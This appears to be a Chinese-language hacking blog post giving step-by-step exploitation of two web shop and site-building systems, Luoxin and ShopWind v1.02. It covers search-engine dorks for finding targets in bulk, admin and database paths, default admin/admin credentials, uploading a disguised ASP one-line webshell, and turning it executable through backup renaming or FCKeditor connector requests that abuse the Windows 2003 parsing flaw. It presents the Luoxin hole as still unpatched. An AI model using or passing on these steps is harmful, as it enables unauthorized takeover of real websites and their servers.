本文将分享两个实战中可用的漏洞利用技巧,分别针对罗信网络建站系统与ShopWind网店系统。直接进入正题,干货满满。
罗信网络建站系统0DAY漏洞详解
批量定位目标非常简单,只需在百度或谷歌搜索“技术支持:罗信网络”即可快速找到大量站点。
后台管理地址为站点路径后添加/lx,直接访问即可进入登录页面。
数据库文件地址则是在站点路径后拼接/lx/databases/,再附上主域名后加.asp(具体文件名需要根据实际情况猜测)。
默认管理账号与密码均为admin。接下来是获取服务器权限的关键步骤。
首先,上传一个后缀名为.jpg的asp一句话木马——没错,就是图片格式的asp马。
随后利用数据库备份功能。需注意:该功能仅允许备份.mdb后缀的文件。那么如何将我们的asp马转化为可执行的后门?还记得经典的x.asp;x.jpg格式吗?这里我们换一种思路:备份时将文件命名为x.asp;x.mdb。完成后,访问备份生成的shell即可执行任意命令。
此外,还存在一个在线编辑器入口:站点+/lx/edit/admin_login.asp,对应的编辑器数据库地址为站点/lx/edit/db/%23edit.mdb。截至目前,官方仍未修复此漏洞。
ShopWind网店系统 v1.02 上传漏洞分析与利用
该程序采用FCKeditor编辑器,利用的是Windows 2003服务器对文件解析的经典特性。直接给出利用方法,两步即可完成:
第一步,创建特殊目录:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步,通过浏览器上传一个jpg格式的asp一句话木马:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
利用2003解析漏洞,最终成功获取服务器权限。整个过程无需复杂绕过,按上述步骤操作即可实现。
